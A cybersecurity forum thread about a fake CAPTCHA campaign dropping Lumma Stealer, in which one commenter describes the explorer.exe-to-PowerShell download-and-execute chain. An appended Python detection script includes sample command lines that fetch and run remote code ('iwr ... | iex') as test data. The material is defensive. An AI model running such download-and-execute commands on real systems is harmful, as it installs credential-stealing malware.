Tricky CAPTCHA Caught Dropping Lumma Stealer Malware (www.darkreading.com)
from kid@sh.itjust.works to cybersecurity@sh.itjust.works on 23 Oct 11:43
https://sh.itjust.works/post/27042332

#cybersecurity


sylver_dragon@lemmy.world on 24 Oct 00:30

Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an Invoke-WebRequest piping the download into an Invoke-Expression (usually the shorter iex alias). No .lnk or .js file involved. Just explorer, PowerShell, infected.
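
The process chain described in the comment above, written as a small detection check over process-creation events. This is an added example, not part of the original thread; the Sysmon Event ID 1 field names (`ParentImage`, `Image`, `CommandLine`) and all sample events are assumptions constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any host OS

# Cmdlets named in the comment, plus the built-in iwr alias.
DOWNLOAD = re.compile(r"(?<![\w-])(invoke-webrequest|iwr)(?![\w-])", re.I)
EVAL = re.compile(r"(?<![\w-])(invoke-expression|iex)(?![\w-])", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}


def is_suspicious(event):
    """explorer.exe -> PowerShell whose command line both downloads and evaluates."""
    parent = basename(event.get("ParentImage", "")).lower()
    image = basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    return (parent == "explorer.exe" and image in SHELLS
            and bool(DOWNLOAD.search(cmd)) and bool(EVAL.search(cmd)))


def hunt(events):
    """Return matching events in input order."""
    return [e for e in events if is_suspicious(e)]


# Constructed events (Sysmon Event ID 1 field names assumed); not from a real host.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
EVENTS = [
    {"id": 1, "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": "powershell.exe iwr https://example.invalid/a | iex"},
    {"id": 2, "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": "PowerShell.exe Invoke-WebRequest https://example.invalid/b | Invoke-Expression"},
    # Download to a file only, no evaluation: not flagged.
    {"id": 3, "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": "powershell.exe Invoke-WebRequest https://example.invalid/c -OutFile report.csv"},
    # Interactive shell opened by the user: not flagged.
    {"id": 4, "ParentImage": EXPLORER, "Image": PS, "CommandLine": "powershell.exe"},
    # Same command line under a different parent: outside this rule's scope.
    {"id": 5, "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": "powershell.exe iwr https://example.invalid/d | iex"},
]

if __name__ == "__main__":
    for e in hunt(EVENTS):
        print(e["id"], e["CommandLine"])
```

The rule is deliberately scoped to the explorer.exe parent the comment describes; event 5 shows that the same command line under another parent needs its own rule.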